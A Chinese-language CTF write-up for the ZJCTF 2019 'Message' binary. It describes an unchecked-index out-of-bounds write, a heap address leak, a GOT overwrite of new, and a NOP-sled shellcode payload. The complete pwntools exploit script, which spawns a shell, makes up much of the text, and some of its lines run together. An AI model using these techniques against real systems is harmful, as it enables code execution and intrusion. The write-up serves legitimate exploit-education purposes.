[ZJCTF 2019]Mesage(地址值强制当成指令)
首先,检查一下程序的保护机制
然后,我们用IDA分析一下,在edit功能里没有检查index,可以溢出,在任意地址处写一个堆地址。
那么,我们就可以把堆地址写到已存在的堆里,然后调用show就能打印出堆地址,然后,我们计算new的got表到堆地址之间的偏移,将new的got表改为一个堆地址。但是这个堆地址里面开始并不是存放shellcode,而是存放着一个堆指针。
通过构造堆,让堆末尾的地址为0xE8,这样,就可以解决问题了,因为0xE8强制转为指令就是这样
因此,我们只要在后方申请一个很大的堆,并在前方大片空间里填充nop,那么就一定可以滑行到主shellcode里
#coding:utf8
from pwn import *context(os='linux',arch='amd64')
sh = process('./message1')
#sh = remote('node3.buuoj.cn',25086)
new_got = 0x00000000006040F0def add(count,string):sh.sendlineafter('>>','1')sh.sendlineafter('add?',str(count))for i in range(count):sh.sendlineafter('message',string)def delete(index):sh.sendlineafter('>>','2')sh.sendlineafter('index:',str(index))def show():sh.sendlineafter('>>','3')def edit(index,count,string):sh.sendlineafter('>>','4')sh.sendlineafter('index:',str(index))sh.sendlineafter('add?',str(count))for i in range(count):sh.sendlineafter('message',string)add(1,'a'*0x8)
edit(-3,1,'a'*0x8)
show()
sh.recvuntil('0:')
sh.recvuntil('0:')
heap_addr = u64(sh.recv(6).ljust(8,'\x00'))
print 'heap_addr=',hex(heap_addr)
offset = (heap_addr - 0x20 - new_got) / 8
edit(0,4,'\x00'*0x18)
edit(0,1,'\x00'*0x18)#new_got->chunk1[call xxx]->chunk2
edit(-1*offset,1,(asm(shellcraft.sh())).rjust(0x10000,'\x90'))
#getshell
sh.sendlineafter('>>','1')
sh.sendlineafter('add?','1')sh.interactive()